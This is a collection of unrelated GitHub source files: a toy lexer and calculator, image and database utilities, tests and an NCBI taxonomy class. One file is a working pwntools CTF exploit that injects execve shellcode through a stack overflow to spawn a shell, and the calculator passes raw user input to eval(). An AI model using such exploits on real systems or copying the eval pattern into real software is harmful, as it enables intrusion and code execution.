    def __eq__(self, __value: Self) -> bool:
        # Tokens compare by their full string form (type chain + value).
        return str(self) == str(__value)
    def __hash__(self) -> int:
        return hash(f"{self.type_}{self.value}")
class Lexer:
    """Splits raw source text into Token objects using the registered
    IdToken definitions, with post-passes that merge adjacent tokens."""
    def __init__(self, code) -> None:
        # NOTE(review): stripping *all* spaces would mangle string literals
        # containing spaces; fine for the current numeric grammar.
        self.code = code.replace(" ", "")
    def split(self):
        """Split the code into pieces based on the single-literal IdTokens."""
        # Regex alternation over every IdToken that has a scalar `value`;
        # multi-character classes (e.g. NUM's digit list) are matched in lex().
        pattern = (
            "("
            + "|".join(
                token.value for token in IdToken.tokens if hasattr(token, "value")
            )
            + ")"
        )
        self.splits = list(
            filter(
                None,
                split(
                    pattern,
                    self.code,
                ),
            )
        )
    def lex(self):
        """Convert the split pieces into Token objects."""
        tokens = []
        for token in self.splits:
            for token_ in IdToken.tokens:
                # Match either the exact literal or a piece made entirely of
                # the definition's allowed characters (e.g. digits for NUM).
                if token == token_.values or contains_item_at_every_pos(
                    token, token_.values
                ):
                    tokens.append(Token(token_.type_, token))
                    break
            else:
                # No definition matched: keep the piece as UNKNOWN.
                tokens.append(Token(UNKNOWN, token))
        self.tokens: list[Token] = tokens
        return tokens
    def stop_keywords_in_names(self, types: tuple[Type, ...]):
        """
        Re-join a keyword that was split out of an identifier, e.g. turn
        ```
        int varint = 5 -> TYPE("int"), TYPE("var"), TYPE("int"), OPERATOR("="), NUM("5")
        ```
        into
        ```
        int varint = 5 -> TYPE("int"), TYPE("varint"), OPERATOR("="), NUM("5")
        ```
        """
        def remove_and_add_duplicates(lst):
            # NOTE(review): merges only the *first* duplicate found per call
            # (the loop breaks after one merge); later duplicates in the
            # stream are left untouched.
            seen = set()
            for i in range(len(lst)):
                if lst[i].type_ in types:
                    if lst[i] in seen:
                        lst[i - 1].value += lst[i].value
                        lst.pop(i)
                        break
                    else:
                        seen.add(lst[i])
        remove_and_add_duplicates(self.tokens)
    def fractions_combine(self):
        # Fold NUM '/' NUM triples into a single FRAC token.
        pre = 0
        next_ = 0
        for i in range(len(self.tokens)):
            pre = i - 1
            next_ = i + 1
            if i > 0 and i < len(self.tokens):
                # NOTE(review): the list shrinks inside this loop while the
                # range was captured up front, and `next_` can run past the
                # end -- fragile for inputs containing several fractions.
                if (
                    self.tokens[pre].type_ is NUM
                    and self.tokens[i] == OPERATOR("/")
                    and self.tokens[next_].type_ is NUM
                ):
                    value = (
                        self.tokens[pre].value
                        + self.tokens[i].value
                        + self.tokens[next_].value
                    )
                    self.tokens.pop(pre)
                    self.tokens.pop(i - 1)
                    self.tokens.pop(next_ - 2)
                    self.tokens.insert(
                        i,
                        Token(
                            FRAC,
                            value,
                        ),
                    )
    def combine(self, converts: dict[tuple[Type | Token], Type | Token]) -> None:
        """
        Combine token runs into one token.  Each key of ``converts`` is a
        pattern of Types (match by category) and Tokens (match exactly);
        each value is the Type or Token the matched run is replaced with::

            [NUM('1'), OPERATOR('/'), NUM('2')]
            lexer.combine({(NUM, OPERATOR("/"), NUM): FRAC})
            [FRAC('1/2')]
        """
        max_len = max([len(lst) for lst in list(converts.keys())])
        indexes = [0 for _ in range(max_len)]
        for i in range(len(self.tokens)):
            if not i < len(self.tokens) - 2:  # ?
                continue
            for j in range(max_len):
                indexes[j] = i + j
            for lst, to in list(converts.items()):
                conditions = []
                # NOTE(review): this enumerate re-binds the outer loop
                # variable `i`; the later uses of `i` in this body rely on
                # that shadowing.
                for i, condition in enumerate(lst):
                    if isinstance(condition, Type):
                        conditions.append(self.tokens[indexes[i]].type_ is condition)
                    elif isinstance(condition, Token):
                        conditions.append(self.tokens[indexes[i]] == condition)
                if not all(conditions):
                    continue
                # Concatenate the matched run's text, drop the run, and
                # insert the replacement token.
                value = ""
                for i in range(len(lst)):
                    value += self.tokens[indexes[i]].value
                for _ in range(len(lst)):
                    self.tokens.pop(indexes[0])
                if isinstance(to, Type):
                    self.tokens.insert(
                        indexes[0],
                        Token(
                            to,
                            value,
                        ),
                    )
                elif isinstance(to, Token):
                    self.tokens.insert(indexes[0], to)
# NOTE(review): `is` checks identity, not equality — this prints False unless
# OPERATOR("/") returns a cached/interned object.
print(Token(OPERATOR, "/") is OPERATOR("/"))
# Minimal REPL driver: read one line, lex it, then fold fraction patterns.
code = input(">>> ")
lexer = Lexer(code)
lexer.split()
lexer.lex()
lexer.stop_keywords_in_names((TYPE,))
lexer.combine({(NUM, OPERATOR("/"), NUM): FRAC, (FRAC, OPERATOR("/"), NUM): FRAC})
print(lexer.tokens)
class Parser:
    """Evaluates the NUM/OPERATOR tokens produced by a Lexer."""

    # Shared namespace intended for (future) variable handling.
    globals_ = {}

    def __init__(self, lexer: Lexer) -> None:
        self.lexer = lexer
        self.pos = 0
        self.current_token = self.lexer.tokens[self.pos]

    def advance(self):
        # Move to the next token and return it (IndexError past the end).
        self.pos += 1
        self.current_token = self.lexer.tokens[self.pos]
        return self.current_token

    def parse(self):
        # Re-assemble number/operator tokens into one expression string.
        x = ""
        for token in self.lexer.tokens:
            if token.type_ is NUM or token.type_ is OPERATOR:
                x += token.value
                # self.advance()
        print(x)
        # SECURITY: eval() executes arbitrary Python. Acceptable for a toy
        # calculator on trusted input; never feed it untrusted strings.
        print(eval(x))
        # if token.type_ is TYPE: # VARIABLE
        #     name = self.advance()
        #     self.advance()
        #     value = self.advance()


# Run the parser on the tokens produced by the driver above.
parser = Parser(lexer)
parser.parse()
| PythonDominator/Pybattle | lexer.py | lexer.py | py | 7,457 | python | en | code | 8 | github-code | 50 |
11956147421 | import numpy as np
import cv2
import os
fname = 'image'  # folder (next to this script) that holds the input images


def getcurpath():
    """Return the absolute directory containing this script."""
    return os.path.dirname(os.path.abspath(__file__))


curpath = getcurpath()
imagepath = os.path.join(curpath, fname)
# FIX: build the path with os.path.join instead of the hard-coded
# '%s\Cattura.png' backslash literal, which only worked on Windows.
imname = os.path.join(imagepath, 'Cattura.png')
img = cv2.imread(imname, 0)  # 0 -> load as grayscale
cv2.imshow('image', img)
k = cv2.waitKey(0)
if k == 27:  # ESC: close without saving
    cv2.destroyAllWindows()
elif k == ord('s'):  # 's': save a copy, then close
    cv2.imwrite('messigray.png', img)
    cv2.destroyAllWindows()
| StormFox23/playground-python | image/vision/main.py | main.py | py | 448 | python | en | code | 2 | github-code | 50 |
40033668017 | from pymongo.cursor import Cursor
from app.database.database import DbManager
from app.database.models import Activity, User
from app.config import Settings
class ActivitiesManager(DbManager):
    """Data-access helper that reads a single user's activities from MongoDB."""

    def __init__(self, settings: Settings, user: User) -> None:
        super().__init__(settings.mongodb_host, settings.mongodb_port)
        self._user = user

    def get(self) -> list[Activity]:
        """Return the user's activities sorted by session timestamp (oldest first).

        When the inherited query builder carries a "dates_between" clause it is
        applied as an additional filter on "session.timestamp".
        """
        # Renamed from `filter`, which shadowed the builtin of the same name.
        query_filter: dict[str, object] = {"username": self._user.username}
        # `_query_builder` is presumably set by DbManager — TODO confirm.
        if self._query_builder:
            query = self._query_builder.get_query()  # call once, not twice
            if "dates_between" in query:
                query_filter["session.timestamp"] = query["dates_between"]
        activities: Cursor = self._client.activity.find(query_filter).sort(
            "session.timestamp", 1
        )
        return [Activity(**activity) for activity in activities]
| rgmf/fit_galgo_api | app/database/activities.py | activities.py | py | 854 | python | en | code | 0 | github-code | 50 |
28076246722 | # -*- coding: utf-8 -*-
"""
@Author 坦克手贝塔
@Date 2023/5/7 14:24
"""
from collections import Counter
from typing import List
"""
"""
"""
思路:如果一个数对 (a,b) 之和能被 60 整除,即 (a+b)mod60=0,那么 (amod60+bmod60)mod60=0,不妨记 x=amod60, y=bmod60,那么有
(x+y)mod60=0,即 y=(60−x)mod60。因此,我们可以遍历歌曲列表,用一个长度为 60 的数组 cnt 记录每个余数 x 出现的次数。对于当前的
x,如果数组 cnt 中存在余数 y=(60−x)mod60,那么将 cnt[y] 累加进答案中。然后,将 x 在数组 cnt 中的出现次数加 1。继续遍历,直到
遍历完整个歌曲列表。
"""
class Solution:
    @staticmethod
    def numPairsDivisibleBy60(time: List[int]) -> int:
        """Count index pairs i < j with (time[i] + time[j]) divisible by 60."""
        # A fixed-size table of the 60 possible remainders replaces a Counter.
        remainder_counts = [0] * 60
        pair_total = 0
        for duration in time:
            remainder = duration % 60
            complement = (60 - remainder) % 60
            # Every earlier song with the complementary remainder pairs with
            # this one; count those first, then record this song.
            pair_total += remainder_counts[complement]
            remainder_counts[remainder] += 1
        return pair_total
| TankManBeta/LeetCode-Python | problem1010_medium.py | problem1010_medium.py | py | 957 | python | zh | code | 0 | github-code | 50 |
40428441663 | from tkinter import *
import pymysql
from tkinter import messagebox
# Tiny tkinter front-end that inserts a first/last name into a MySQL table.
top = Tk()
top.title('DataBase Interface')
L1 = Label(text="First Name")
L1.place(x=10,y=10)
L1.pack()
E1 = Entry(bd = 5)
E1.pack()
L2 = Label(text = "Last Name")
L2.place(x=10,y=500)
L2.pack()
E2 = Entry(bd = 5)
E2.pack()
def getcontent():
    # Read both entry widgets; reject the submit when either is empty.
    E1content = E1.get()
    E2content = E2.get()
    if len(E1content) == 0 or len(E2content) == 0:
        messagebox.showinfo("User Input","please fill the data properly")
    else:
        # NOTE(review): credentials are hard-coded and the connection is
        # never closed — consider a config file and a context manager.
        db_conn = pymysql.connect(host = "localhost",user = "root",password = "library",db = "student")
        cursor_s = db_conn.cursor()
        # Parameterized query: safe against SQL injection.
        cursor_s.execute("insert into studentname(firstname,lastname) values(%s,%s)",(E1content,E2content))
        db_conn.commit()
        messagebox.showinfo("User Input","data inserted sucessfully")
        #print(E1content)
        #print(E2content)
B = Button(text = "Submit",command = getcontent)
B.pack()
top.state("zoomed")
top.mainloop()
16252026350 | import pytest
from pytest_mock import mocker
from lib.character import Character
from lib.spell import Spell
def test_morgue_filepath():
    # Local mode should resolve to the Crawl morgue directory on disk.
    # NOTE(review): the expected path hard-codes the developer's home dir.
    local_mode = True
    character = Character(name="GucciMane", local_mode=local_mode)
    expected_filepath = f"/Users/begin/Library/Application Support/Dungeon Crawl Stone Soup/morgue/GucciMane.txt"
    assert character.morgue_filepath == expected_filepath


def test_morgue_url():
    # Without local mode, morgue files come from the public crawl server.
    character = Character(name="GucciMane")
    expected_url = "http://crawl.akrasiac.org/rawdata/GucciMane/GucciMane.txt"
    assert character.morgue_url == expected_url


def test_spells():
    # spells() yields Spell objects parsed from the morgue file.
    character = Character(name="GucciMane", local_mode=True)
    spells = list(character.spells())
    assert type(spells[0]) == Spell


def test_spells_above():
    # spells_above(n) returns the raw lines for spells of level > n,
    # exactly as they appear in the morgue file.
    character = Character(name="GucciMane", local_mode=True)
    spells = character.spells_above(4)
    expected_spells = [
        "Poison Arrow              Conj/Pois      #######...    1%          6.0      None",
        "Throw Icicle              Conj/Ice       ######..      1%          4.0      None",
        "Yara's Violent Unravell   Hex/Tmut       ######....    4%          5.0      None",
        "Invisibility              Hex            ######..     14%          6.0      None",
        "Metabolic Englaciation    Hex/Ice        ######....   17%          5.0      None",
        "Alistair's Intoxication   Tmut/Pois      #####...     24%          5.0      None",
        "Petrify                   Tmut/Erth      ####....     38%          4.0      None",
    ]
    assert spells == expected_spells
def test_morgue_file_from_s3(mocker):
    # When the S3 cache returns a file, morgue_file() uses it directly.
    character = Character(name="beginbot")
    mocker.patch.object(character, "s3_morgue_file")
    expected_morgue_file = "Cool Morgue file"
    character.s3_morgue_file.return_value = expected_morgue_file
    morgue_file = character.morgue_file()
    character.s3_morgue_file.assert_called()
    assert morgue_file == expected_morgue_file


def test_morgue_file_from_crawl_server(mocker):
    # When the S3 cache misses (returns None), morgue_file() falls back to
    # fetching from the online crawl server.
    character = Character(name="beginbot")
    mocker.patch.object(character, "s3_morgue_file")
    mocker.patch.object(character, "fetch_online_morgue")
    expected_morgue_file = "Online Morgue"
    character.s3_morgue_file.return_value = None
    character.fetch_online_morgue.return_value = expected_morgue_file
    morgue_file = character.morgue_file()
    character.s3_morgue_file.assert_called()
    character.fetch_online_morgue.assert_called()
    assert morgue_file == expected_morgue_file
def test_spellcasting():
    # Spellcasting level is parsed from the fixture morgue file.
    character = Character(morgue_filepath="support/GucciMane.txt", local_mode=True)
    assert character.spellcasting() == 3.5


def test_skills():
    # skills() returns the raw skill lines exactly as they appear in the
    # fixture morgue file ('+' = rising, '-' = falling).
    character = Character(morgue_filepath="support/GucciMane.txt", local_mode=True)
    expected_skills = [
        " + Level 2.9 Dodging",
        " - Level 2.4 Stealth",
        " + Level 3.5 Spellcasting",
        " + Level 4.6 Conjurations",
    ]
    assert character.skills() == expected_skills


def test_lookup_skill():
    # lookup_skill() resolves a skill by name and exposes its level.
    character = Character(morgue_filepath="support/GucciMane.txt", local_mode=True)
    assert character.lookup_skill("Conjurations").level == 4.6
| davidbegin/morguebot | test/test_character.py | test_character.py | py | 2,942 | python | en | code | 6 | github-code | 50 |
36062014752 | from rest_framework.permissions import BasePermission
class CoursesPermission(BasePermission):
    """Course collection permission: anyone may GET, only superusers may POST."""

    def has_permission(self, request, view):
        if request.method == 'GET':
            return True
        if request.method == 'POST' and request.user.is_superuser:
            return True
        # Explicitly deny everything else instead of implicitly returning
        # None (which DRF treated as falsy anyway).
        return False
class CoursesByIdPermission(BasePermission):
    """Course detail permission: anyone GETs, staff/superusers PUT, superusers DELETE."""

    def has_permission(self, request, view):
        if request.method == 'GET':
            return True
        if request.method == 'PUT':
            # Staff or superuser may update.
            return bool(request.user.is_superuser or request.user.is_staff)
        if request.method == 'DELETE' and request.user.is_superuser:
            return True
        # Explicit denial instead of the original implicit None return.
        return False
| nicole-malaquias/Kanvas | course/permissions.py | permissions.py | py | 811 | python | en | code | 1 | github-code | 50 |
42442587154 | import ckan.model as model
import ckan.logic as logic
from ckan.common import c, _
def get_ksa_helpers():
    """Expose the KSA template helper functions to CKAN by name."""
    return {
        'ksa_bit_check': ksa_bit_check,
        'ksa_group_list': ksa_group_list,
        'get_ksa_group_img': get_ksa_group_img,
        'relation_attrs_update': relation_attrs_update,
        'relations_display': relations_display,
    }
def ksa_bit_check(mask, pos):
    """Return True when bit `pos` of `mask` is set (None/''/0 count as 0)."""
    bits = int(mask or 0)
    return (bits >> pos) & 1 == 1
def ksa_group_list():
    """Return the list of CKAN groups via the `group_list` action."""
    return logic.get_action('group_list')({}, {})
def get_ksa_group_img(group):
    """Return the image URL configured for `group` ('' when unset)."""
    group_dict = logic.get_action('group_show')({}, {'id': group})
    return group_dict.get('image_url', '')
def relation_attrs_update(data, attrs):
    """Append '&except=<dataset name>' to the 'data-module-source' attribute.

    Returns the mutated `attrs` dict, or None when `data` has no name or the
    name already appears in the source URL.
    """
    dataset_name = data.get('name')
    if not dataset_name:
        return None
    api_url = ''
    for attr_name in attrs:
        if attr_name == 'data-module-source' and dataset_name not in attrs[attr_name]:
            api_url = attrs[attr_name] + "&except=" + dataset_name
    if api_url:
        attrs['data-module-source'] = api_url
        return attrs
    return None
def relations_display(value):
    """Resolve a comma-separated list of dataset ids into package dicts.

    Returns a list of packages for a non-empty `value`, otherwise None.
    Uses the current request user (ckan `c`) for the action context.
    """
    dataset_list = []
    context = {
        'model': model,
        'session': model.Session,
        'user': c.user,
        'auth_user_obj': c.userobj
    }
    if value:
        data = value.split(',')
        for dataset in data:
            # pkg = model.Package.get(dataset)
            # NOTE(review): package_show raises NotFound for unknown ids —
            # the truthiness check below never filters anything; confirm.
            pkg = logic.get_action('package_show')(context, {'id': dataset})
            if pkg:
                dataset_list.append(pkg)
        return dataset_list
    return
| Yesser-GitHub/ckanext-iar | ckanext/ksaiar/helpers.py | helpers.py | py | 1,437 | python | en | code | 0 | github-code | 50 |
15253837283 | #!/usr/bin/env python3
from pwn import *
# Stack-based shellcode exploit for chall_15 (Sunshine CTF 2020 speedrun).
binary = context.binary = ELF('./chall_15')

# Target either a local process or the remote challenge service.
if not args.REMOTE:
    p = process(binary.path)
else:
    p = remote('chal.2020.sunshinectf.org', 30015)
    p.sendline()

# The binary leaks a stack address; parse it from the banner line.
p.recvuntil('There\'s a place where nothing seems: ')
_ = p.recvline().strip()
stack = int(_,16)
log.info('stack: ' + hex(stack))

# x86-64 execve("/bin//sh") shellcode (27 bytes).
# http://shell-storm.org/shellcode/files/shellcode-905.php
shellcode = b'\x6a\x42\x58\xfe\xc4\x48\x99\x52'
shellcode += b'\x48\xbf\x2f\x62\x69\x6e\x2f\x2f'
shellcode += b'\x73\x68\x57\x54\x5e\x49\x89\xd0'
shellcode += b'\x49\x89\xd2\x0f\x05'

payload = b''
# Pad to the first cookie slot, then place the expected 0xfacade value.
payload += (0x4e - 0x44) * b'A'
payload += p32(0xfacade)
# Align the shellcode start to a 16-byte boundary on the leaked stack.
payload += (0x10 - (stack + len(payload)) & 0xf) * b'B'
stack += len(payload)
log.info('stack: ' + hex(stack))
payload += shellcode
# Pad out to the second cookie, then fill up to the saved return address,
# which is overwritten with the (aligned) shellcode address.
payload += (0x4e - len(payload) - 0xc) * b'C'
payload += p32(0xfacade)
payload += (0x4e - len(payload)) * b'D'
payload += p64(stack)

p.sendline(payload)
p.interactive()
| datajerk/ctf-write-ups | sunshinectf2020/speedrun/exploit_15.py | exploit_15.py | py | 953 | python | en | code | 116 | github-code | 50 |
29575496776 | import re
# Kattis "Fifty Shades of Pink": count input lines mentioning pink or rose.
line_count = int(input())
answer = 0
for _ in range(line_count):
    # Renamed from `str` (which shadowed the builtin); a plain substring
    # test replaces the two regex findall calls, which were overkill here.
    line = input().lower()
    if "pink" in line or "rose" in line:
        answer += 1
if answer == 0:
    print('I must watch Star Wars with my daughter')
else:
    print(answer)
8630029592 | # python3
import math
def nums(num1):
    """Print and return all 'sequential digit' numbers within [low, high].

    A sequential-digit number is one whose digits are consecutive and
    increasing (12, 345, 6789, ...). `num1` is a two-element [low, high]
    list of inclusive bounds. Prints all candidates of the relevant digit
    lengths, then the filtered in-range list, and returns the latter
    (the original implementation returned None; returning the list is a
    backward-compatible generalization).
    """
    low, high = num1
    candidates = []
    # Candidate lengths run from len(low) to len(high) digits; for each
    # length, the leading digit may start anywhere that keeps the last
    # digit <= 9 (start + length - 1 <= 9  <=>  start < 11 - length).
    for length in range(len(str(low)), len(str(high)) + 1):
        for start in range(1, 11 - length):
            digits = range(start, start + length)
            candidates.append(int("".join(map(str, digits))))
    print(candidates)
    result = [value for value in candidates if low <= value <= high]
    print(result)
    return result
if __name__ == '__main__':
    # Read the inclusive [low, high] bounds from stdin, e.g. "100 300".
    #inpu=list(map(int, input("Nums: ").split()))
    num1=list(map(int,input("Num: ").split()))
    nums(num1)
| bharadwajvaduguru8/leetcode_contests | question.py | question.py | py | 956 | python | en | code | 0 | github-code | 50 |
12418676814 | import scrapy
class StatesSpider(scrapy.Spider):
    """Scrapes recent Myanmar earthquake entries from earthquaketrack.com."""

    name = 'states'
    allowed_domains = ['www.earthquaketrack.com']  # http/s is prohibited in this list var
    start_urls = ['https://www.earthquaketrack.com/p/myanmar/recent']

    def parse(self, response):
        """Yield one item per quake container, then follow pagination."""
        rows = response.xpath("//div[@class='quake-info-container']")
        for row in rows:
            yield {
                'timeago': row.xpath(".//abbr/text()").get(),
                'scale': row.xpath(".//span/text()").get(),
                'city': row.xpath(".//a[2]/text()").get(),
                'region': row.xpath(".//a[3]/text()").get(),
            }
        # BUG FIX: the original tested the already-formatted URL string,
        # which is always truthy (it becomes ".../None" on the last page and
        # the spider kept requesting a bogus URL). Test the raw href so the
        # crawl stops when there is no next page.
        next_page = response.xpath("//a[@class='next_page']/@href").get()
        if next_page:
            next_page_absolute_path = f"https://www.earthquaketrack.com{next_page}"
            yield scrapy.Request(url=next_page_absolute_path, callback=self.parse)
11259784429 | import os
import numpy
from kaggle_imgclassif.cassava.data import CassavaDataModule, CassavaDataset
from tests import _ROOT_DATA
PATH_DATA = os.path.join(_ROOT_DATA, "cassava")
def test_dataset(path_data=PATH_DATA):
    # Smoke test: indexing the dataset yields a numpy image array.
    dataset = CassavaDataset(
        path_csv=os.path.join(path_data, "train.csv"),
        path_img_dir=os.path.join(path_data, "train_images"),
    )
    img, lb = dataset[0]
    assert isinstance(img, numpy.ndarray)


def test_datamodule(path_data=PATH_DATA):
    # Smoke test: the datamodule sets up and its train loader yields a
    # non-empty batch of images and labels.
    dm = CassavaDataModule(
        path_csv=os.path.join(path_data, "train.csv"),
        path_img_dir=os.path.join(path_data, "train_images"),
    )
    dm.setup()
    for imgs, lbs in dm.train_dataloader():
        assert len(imgs)
        assert len(lbs)
        break
| Borda/kaggle_image-classify | tests/cassava/test_data.py | test_data.py | py | 760 | python | en | code | 38 | github-code | 50 |
18677190464 | import pytest
from pycfmodel.model.resources.iam_role import IAMRole
@pytest.fixture()
def iam_role():
    # A minimal CloudFormation IAM role: assumable by EC2 and one account
    # root, carrying a single wildcard inline policy named "root".
    return IAMRole(
        **{
            "Type": "AWS::IAM::Role",
            "Properties": {
                "AssumeRolePolicyDocument": {
                    "Version": "2012-10-17",
                    "Statement": {
                        "Effect": "Allow",
                        "Principal": {"Service": ["ec2.amazonaws.com"], "AWS": "arn:aws:iam::111111111111:root"},
                        "Action": ["sts:AssumeRole"],
                    },
                },
                "Path": "/",
                "Policies": [
                    {
                        "PolicyName": "root",
                        "PolicyDocument": {
                            "Version": "2012-10-17",
                            "Statement": {"Effect": "Allow", "Action": "*", "Resource": "*"},
                        },
                    }
                ],
            },
        }
    )


def test_policies(iam_role):
    # The fixture's single inline policy is parsed and exposed by name.
    policies = iam_role.Properties.Policies
    assert len(policies) == 1
    assert policies[0].PolicyName == "root"
| midisfi/pycfmodel | tests/resources/test_iam_role.py | test_iam_role.py | py | 1,149 | python | en | code | null | github-code | 50 |
70978041757 | from os import environ
from os.path import join, dirname
import gzip
import glob
import pandas as pd
from .dataset_modification import (
taxa_to_organism,
)
from .constants import (
RANK_LIST,
ALLOWED_SUPERKINGDOMS,
CANONICAL_RANKS,
ROOT_RANK,
)
NCBI_DELIM = '\t|' # really...
NAMES_ENV_VAR = 'MD2_NCBI_NAMES'
NODES_ENV_VAR = 'MD2_NCBI_NODES'
RANKEDLINEAGE_ENV_VAR = 'MD2_NCBI_RANKEDLINEAGE'
NAMES_DEF = join(dirname(__file__), 'ncbi_tree/names.dmp.gz')
NODES_DEF = join(dirname(__file__), 'ncbi_tree/nodes.dmp.gz')
RANKEDLINEAGE_DEF = join(dirname(__file__), 'ncbi_tree/rankedlineage.dmp.gz')
class TaxonomicRankError(Exception):
    """Raised when a taxon cannot be resolved or placed at a requested rank."""
    pass
class NCBITaxaTree:
    """In-memory NCBI taxonomy: parent relations plus name<->node lookup tables."""

    def __init__(self, parent_map, names_to_nodes, nodes_to_name):
        self.parent_map = parent_map            # node id -> parent node id (None at root)
        self.names_to_nodes = names_to_nodes    # scientific name -> node id
        self.nodes_to_name = nodes_to_name      # node id -> {'name', 'rank'}

    def _node(self, taxon_name):
        """Return the node id for a scientific name."""
        return self.names_to_nodes[taxon_name]

    def _name(self, node_num):
        """Return the scientific name for a node id."""
        return self.nodes_to_name[node_num]['name']

    def rank(self, taxon_name):
        """Return the taxonomic rank recorded for the given taxon."""
        return self.nodes_to_name[self._node(taxon_name)]['rank']

    def taxon_id(self, taxon_name):
        """Return the NCBI taxon id (node id) for the given taxon."""
        return self._node(taxon_name)

    def parent(self, taxon):
        """Return the name of the parent taxon."""
        return self._name(self.parent_map[self._node(taxon)])

    def ancestor_rank(self, rank, taxon, default=None):
        """Return the ancestor of taxon at the given rank.

        Raises KeyError for unknown taxa when `default` is None; otherwise
        returns `default` both on lookup failure and when no ancestor of the
        requested rank exists (the original returned None in the latter case
        even when a default was supplied).
        """
        try:
            parent_num = self.parent_map[self._node(taxon)]
            while int(parent_num) > 1:
                if rank == self.nodes_to_name[parent_num]['rank']:
                    return self.nodes_to_name[parent_num]['name']
                parent_num = self.parent_map[parent_num]
        except KeyError:
            if default is None:
                raise
        # No ancestor at `rank` (or a tolerated lookup failure).
        return default

    def ancestors(self, taxon, max_rank=ROOT_RANK):
        """Alias for ancestors_list."""
        return self.ancestors_list(taxon, max_rank=max_rank)

    def ancestors_list(self, taxon, max_rank=ROOT_RANK):
        """Return a phylogenetically sorted list of ancestors of taxon including taxon."""
        max_rank_index = RANK_LIST.index(max_rank)
        try:
            rank = self.rank(taxon)
            taxon_rank_index = RANK_LIST.index(rank)
        except ValueError:
            raise TaxonomicRankError(f'Requested rank {rank} is not in rank list.')
        if taxon_rank_index > max_rank_index:
            raise TaxonomicRankError(f'Requested rank {rank} is above {taxon}.')
        parent_num = self.parent_map[self._node(taxon)]
        parent_rank = self.nodes_to_name[parent_num]['rank']
        try:
            rank_index = RANK_LIST.index(parent_rank)
        except ValueError:
            # Ranks outside RANK_LIST (e.g. 'no rank') never terminate the walk.
            rank_index = -1
        ancestor_name_list = [taxon]
        # Walk towards the root until we pass max_rank or hit node 1 (root).
        while max_rank_index > rank_index:
            ancestor_name_list.append(self.nodes_to_name[parent_num]['name'])
            if int(parent_num) == 1:  # root
                break
            parent_num = self.parent_map[parent_num]
            parent_rank = self.nodes_to_name[parent_num]['rank']
            try:
                rank_index = RANK_LIST.index(parent_rank)
            except ValueError:
                rank_index = -1
        return ancestor_name_list

    def canonical_taxonomy(self, taxon):
        """Return a dict with the canonical (KPCOFGS) taxonomy for a taxon and the taxon id.

        BUG FIX: the original called ancestors_list with swapped arguments,
        then overwrote the accumulated dict with a call to an undefined
        `ancestor_rank` name, returning garbage. Now it accumulates one
        entry per canonical rank found along the ancestry.
        """
        out = {'taxon_id': self.taxon_id(taxon)}
        for ancestor in self.ancestors_list(taxon):
            rank = self.rank(ancestor)
            if rank in CANONICAL_RANKS:
                out[rank] = ancestor
        return out

    def phylum(self, taxon, default=None):
        """Return the phylum for the given taxon."""
        return self.ancestor_rank('phylum', taxon, default=default)

    def genus(self, taxon, default=None):
        """Return the genus for the given taxon."""
        return self.ancestor_rank('genus', taxon, default=default)

    def place_microbe(self, taxon):
        """Returns a tuple of (taxonomic id, rank, superkingdom) for the taxon."""
        if taxon == 'root':
            raise TaxonomicRankError('Cannot give superkingdom for root.')
        if self.rank(taxon) in ['subspecies', 'no rank']:
            raise TaxonomicRankError(f'Cannot resolve {taxon} at rank {self.rank(taxon)}.')
        superkingdom = self.ancestor_rank('superkingdom', taxon)
        if superkingdom in ALLOWED_SUPERKINGDOMS:
            return self.taxon_id(taxon), self.rank(taxon), superkingdom
        raise TaxonomicRankError(f'Superkingdom {superkingdom} not allowed.')

    def _tree(self, taxa):
        """Build the minimal subtree (node id -> parent/children) spanning `taxa`."""
        queue, tree = {self._node(el) for el in taxa}, {}
        root = None
        while len(queue):
            cur_node = queue.pop()
            parent_node = self.parent_map[cur_node]
            if cur_node not in tree:
                tree[cur_node] = {'parent': parent_node, 'children': set()}
            if not parent_node:
                root = cur_node
                continue
            try:
                tree[parent_node]['children'].add(cur_node)
            except KeyError:
                # First time we see the parent: create it and schedule it so
                # its own ancestry gets linked in as well.
                tree[parent_node] = {
                    'parent': self.parent_map[parent_node],
                    'children': set([cur_node])
                }
                queue.add(parent_node)
        return root, tree

    def taxa_sort(self, taxa):
        """Return a list with all elements of taxa in DFS order."""
        taxa, sort = set(taxa), []
        root, tree = self._tree(taxa)

        def dfs(node):
            # Depth-first over the spanning subtree; only requested taxa are
            # recorded, internal connector nodes are traversed silently.
            for child_node in tree[node]['children']:
                child = self._name(child_node)
                if child in taxa:
                    sort.append(child)
                dfs(child_node)

        dfs(root)  # typically 1 is the root node
        return sort

    def all_names(self):
        """Return a list of all scientific names in the tree. Order not guaranteed."""
        return list(self.names_to_nodes.keys())

    @classmethod
    def parse_files(cls, names_filename=None, nodes_filename=None):
        """Return a tree parsed from the given files."""
        names_filename = names_filename if names_filename else environ.get(NAMES_ENV_VAR, NAMES_DEF)
        nodes_filename = nodes_filename if nodes_filename else environ.get(NODES_ENV_VAR, NODES_DEF)
        with gzip.open(names_filename) as names_file, gzip.open(nodes_filename) as nodes_file:
            names_to_nodes, nodes_to_name = {}, {}
            for line in names_file:
                line = line.decode('utf-8')
                tkns = [tkn.strip() for tkn in line.strip().split(NCBI_DELIM)]
                # FIX: guard requires >= 4 tokens since tkns[3] is accessed
                # (the original checked >= 3 and could IndexError).
                if len(tkns) >= 4:
                    if tkns[3] != 'scientific name':
                        continue
                    node, name = tkns[:2]
                    names_to_nodes[name] = node
                    nodes_to_name[node] = {'name': name, 'rank': None}
            parent_map = {}
            for line in nodes_file:
                line = line.decode('utf-8')
                tkns = [tkn.strip() for tkn in line.strip().split(NCBI_DELIM)]
                if len(tkns) >= 4:
                    node, parent, rank = tkns[:3]
                    if node.isdigit():
                        # Assumes every node appeared in names.dmp first —
                        # TODO confirm for truncated dumps.
                        nodes_to_name[node]['rank'] = rank
                        if node == parent:  # NCBI has a self loop at the root
                            parent = None
                        parent_map[node] = parent
        return cls(parent_map, names_to_nodes, nodes_to_name)
| dcdanko/MD2 | microbe_directory/taxa_tree.py | taxa_tree.py | py | 7,927 | python | en | code | 16 | github-code | 50 |
21119742709 | import numpy as np
import os
import sys
import itertools
import pickle
from typing import MutableMapping
import pandas as pd
from tqdm import tqdm
import string
try:
import ntpath
except ImportError as e:
raise ImportError("Import dependency not met: %s" % e)
import inspect
import errno
# FNA imports
from fna.tools.parameters import ParameterSet
from fna.tools.utils.data_handling import isiterable, import_mod_file
from fna.tools.utils import operations, logger
# add model source path
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + '/../../')
from src.defaults.paths import set_project_paths
from src.utils.system import set_system_parameters
logs = logger.get_logger(__name__)
np.set_printoptions(threshold=sys.maxsize, suppress=True)
def parse_template(template_file, field_dictionary, save_to=None):
    """Read a template file and substitute the provided fields.

